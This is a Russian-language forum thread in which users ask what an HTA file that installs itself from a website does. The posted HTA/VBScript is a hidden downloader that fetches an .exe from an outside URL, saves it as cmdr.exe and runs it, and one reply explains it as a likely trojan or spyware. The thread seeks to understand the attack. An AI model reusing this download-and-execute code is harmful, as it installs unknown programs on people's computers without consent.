[develop] помогите разобраться с кодом

Tata131290

хочу помочь другу. вот его проблема:

Кто знает что тут делается? какая то фигня автоматом ставится на мой комп когда захожу на акк.ру может объясните что тут они мудрят?

<HTA:APPLICATION ID="oHTA"
APPLICATIONNAME="myApp"
BORDER="none"
BORDERSTYLE="normal"
CAPTION="no"
ICON=""
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
SHOWINTASKBAR="no"
SINGLEINSTANCE="no"
SYSMENU="yes"
VERSION="1.0"
WINDOWSTATE="minimize"/>
<script language="vbscript">
self.MoveTo 5000,5000
payload = "http://www.accords.ru/ns/nnews.exe"
target = "c:\\%windir%\\cmdr.exe"
const ForWriting = 2
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET", payload, false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile(target, ForWriting)
for i = 0 to UBound(contents)
thischarcode = ascb(midb(contents, i+1, 1
f.Write chr(thischarcode)
next
f.close
Set shell=CreateObject("WScript.Shell")
shell.run(target)
</script>

обсуждение тут: http://forums.amdm.ru/index.php?showtopic=154

Olga22

activex rox

psm-home

Кто знает что тут делается?

Приведенный код - это HTA (HTML Application). Содержащийся в нём код на VBScript делает HTTP GET запрос, получает файл http://www.accords.ru/ns/nnews.exe. Затем создаёт на диске файл c:\%windir%\cmdr.exe и записывает туда то, что получено GET'ом. После этого свежесозданный файл запускается на выполнение. Работает такое только в Internet Explorer, начиная с 5-ой версии, вроде. Все это похоже на троян или spyware.

Tata131290

После этого свежесозданный файл запускается на выполнение

а есть какой-нибудь софт, чтобы проследить, что именно делает этот файл? насчет трояна у мня сомнения, т.к. сайт популярный, смысл веб-мастерам пичкать их посетителей червями? а spyware... что это? просто смотрит какие страницы чел посещает?

Olga22

>что именно делает этот файл?
по ходу, раскручивает сайты для http://www.internetsolution.ru/

Tata131290

каким образом?